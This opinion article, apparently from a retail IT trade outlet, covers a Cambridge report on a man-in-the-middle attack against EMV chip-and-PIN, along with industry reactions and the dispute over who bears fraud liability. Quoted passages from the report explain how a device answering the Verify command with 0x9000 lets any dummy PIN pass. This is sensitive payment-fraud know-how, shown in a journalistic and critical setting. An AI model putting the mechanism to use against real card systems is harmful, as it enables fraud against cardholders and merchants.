As reactions to the report's man-in-the-middle attack methodology piled on, it was eerie how perfunctory the denials were, even among the most aggressive EMV advocates. My personal favorite is a statement that banking giant HSBC Group issued in the U.K. to the BBC: "Although they have raised a clear security concern with regards to chip-and-PIN, which we are taking very seriously, the problem highlighted is relevant to all card issuers and not just HSBC." The bank didn't even bother denying that the university's hack worked.
For years, security aficionados have pushed chip-and-PIN while conceding that it's not really secure but probably still better than what's being done in the U.S. (formally called the "Hope And Pray They Don't Take My Lunch Money Today" protocol). But the subtext implying that it's not really all that secure is almost always present.
(For more on this topic, check out Walter Conway’s latest StorefrontBacktalk column, “Chip-And-PIN Is Not A Free Pass On PCI.”)
We'll get into the details of the Cambridge report in a moment. In the meantime, it’s important to point out that the biggest criticism of this report is that the equipment needed to hack chip-and-PIN is too bulky for the attacks to actually happen without cashiers noticing. That argument was effectively obliterated with a wonderful piece of video journalism done by the BBC. It filmed one of the Cambridge researchers actually using this attack—successfully—at a wide range of retail locations leveraging borrowed cards of BBC staffers. Seeing the attack in action makes two things clear: It's not theoretical, and it's even practical. The movements of the pretend cyberthief were natural and not at all suspicious.
Retail IT execs specializing in security were especially concerned about the relative ease of the university hack execution. Braden Black, a senior enterprise architect (and security specialist) for 305-store shoe chain DSW, said that, in his opinion, the biggest problem with chip-and-PIN—as it’s currently deployed—is that banks have little incentive to make these systems secure because they no longer have any liability if they're repeatedly breached. That liability has been pushed to the retailers.
"The ramifications of this attack are most disturbing when viewed in light of the fraud liability regulations that were adopted alongside the technology. Essentially, the banks offloaded fraud liability to merchants and cardholders. In this case, specifically, the attack vector exploited a flaw in the EMV PIN verification protocol causing a transaction to appear to the bank to be PIN-verified while the chip believes that signature-based verification is taking place. One no longer needs any knowledge of the PIN to authorize a transaction," Black said. "This places the onus of liability upon the cardholder, who is assumed to be liable for the fraudulent transaction unless they can demonstrate that they were not present for the transaction and did not disclose their PIN code."Black added that it's the liability split that dictates who has the incentive to properly safeguard systems. "Most importantly, with the legislation in place to shift liability to merchants and cardholders, the banks have little incentive to improve the system--their cost savings have already been achieved. However, neither the merchants nor the cardholders can effect any changes to the security model for the system," he said. "Chip-and-PIN is dangerous, not due to the security issues but because the accompanying legislation has disconnected the incentive to continue the security development lifecycle from the parties that are directly responsible for it."
Another IT security manager—albeit with an even larger chain—said industry officials who try to defend EMV by poking holes in the Cambridge report are doing little more than "damage control" and that their defenses "don't forgive a broken protocol."
But that security manager added that the effort required for the university hack is unlikely—right away—to be used widely. Variations of it, however, will almost certainly materialize and then quickly mushroom. "This is probably not a serious threat for some time to come. But attackers never get less effective. And I don't think they'll have fixed the problem by the time we see some actual criminals exploiting it."
The Cambridge report details an approach that tricks both the chip and the card reader into believing that the other has given the transaction its blessing.
"The central flaw in the protocol is that the proceedings of the PIN verification step are never explicitly authenticated. Whilst the authenticated data sent to the bank contains two fields which incorporate information about the result of the cardholder verification, they do not together provide an unambiguous encoding of the events which took place," the report said. The terminal verification results (TVR) "merely enumerates various possible failure conditions for the authentication and, in the event of success, does not indicate which particular method was used. Therefore, a man-in-the-middle device, which can intercept and modify the communications between card and terminal, can trick the terminal into believing that PIN verification succeeded by responding with 0x9000 to Verify, without actually sending the PIN to the card."
The report continued with its planned attack technique. "A dummy PIN must be entered, but the attack allows any one to be accepted. The card will then believe that the terminal did not support PIN verification, and has either skipped cardholder verification or used a signature instead," the report said. "Because the dummy PIN is never sent to the card, the PIN retry counter is not altered. Neither the card nor terminal will spot this subterfuge, because the cardholder verification byte of the TVR is only set if PIN verification has been attempted and failed. The terminal believes that PIN verification succeeded (and so generates a zero byte), and the card believes it was not attempted, so it will accept the zero byte."
"The IAD does often indicate whether PIN verification was attempted; however, it is in an issuer-specific proprietary format, and not specified in EMV. Therefore, the terminal (which knows the cardholder verification method chosen) cannot decode it. The issuer, which can decode the IAD, does not know which cardholder verification method was used, and so cannot use it to prevent the attack," the report said. "Because of the ambiguity in the TVR encoding, neither party can identify the inconsistency between the cardholder verification methods they each believe were used. The issuer will thus believe that the terminal was incapable of soliciting a PIN, which is an entirely plausible, yet inaccurate, conclusion."The most comprehensive—albeit mysterious—attack on the Cambridge report was contained in a story from SecureIDNews. This story said that, "The Smart Card Alliance has reviewed the hack along with other industry organizations and concluded that widespread implementation of this attack is unlikely." The mysterious part is that, according to Smart Card Alliance Spokeswoman Deb Montner, the Smart Card Alliance--to her knowledge--has reached no such conclusions and has issued no such statement.
Well, no matter its source, the points are reasonable enough challenges of some of the Cambridge University report's details. First are questions about the practicality of using a stolen EMV card before the card is reported missing. The SecureIDNews story also said the hack damage potential couldn't extent to ATMs for cash withdrawals, "as ATMs rely on an online PIN verification."
The report attributed to the Smart Card Alliance also raised two weaker challenges, namely that the attack couldn't work in the real world (something the BBC video of it happening in the real world tends to disprove) and that "the attack is technically difficult, requiring highly sophisticated software and customized hardware that could only be created by individuals with extensive knowledge of EMV protocols." Cyberthiefs with a shot at the millions of British EMV cards? They tend to be very quick studies and, by the way, will be much better funded than a university research team.
DSW's Black also questioned this shortcoming, saying that it flies in the face of the history of cyberthief gangs. "Cookie-cutter solutions are only a matter of time. By way of example, look at PIN pad skimmers and the multitude of hacking frameworks and tools that require little or no knowledge of the underlying protocols," he said.
Another attack of the report attributed to the Smart Card Alliance said: "Such an attack would not compromise the smart card, as the PIN would still remain secure inside the card.” Black argued that this defense misses the point: "With this attack, knowledge of the PIN is extraneous."
To a major extent, these are all—on both sides—nitpicks. The big-picture point is that this Cambridge report makes it clear how flawed chip-and-PIN currently is. Can these flaws be fixed? Yes, and rather quickly, too. But should the payments industry sit around and wait for a university to point out huge security holes?
If the industry was more stunned by these revelations, it would be more comforting. But the muted reactions confirm that holes of this nature are well known. Not the specific holes, perhaps. But it's not a surprise to anyone that the protocol was not written with airtight security in mind.
It reminds me of my early reporting career, when I spent years investigating semi-corrupt government agencies and politicians in New Jersey. The surprise was never that a particular politician was crooked. Rather, it was that someone had bothered to prove it.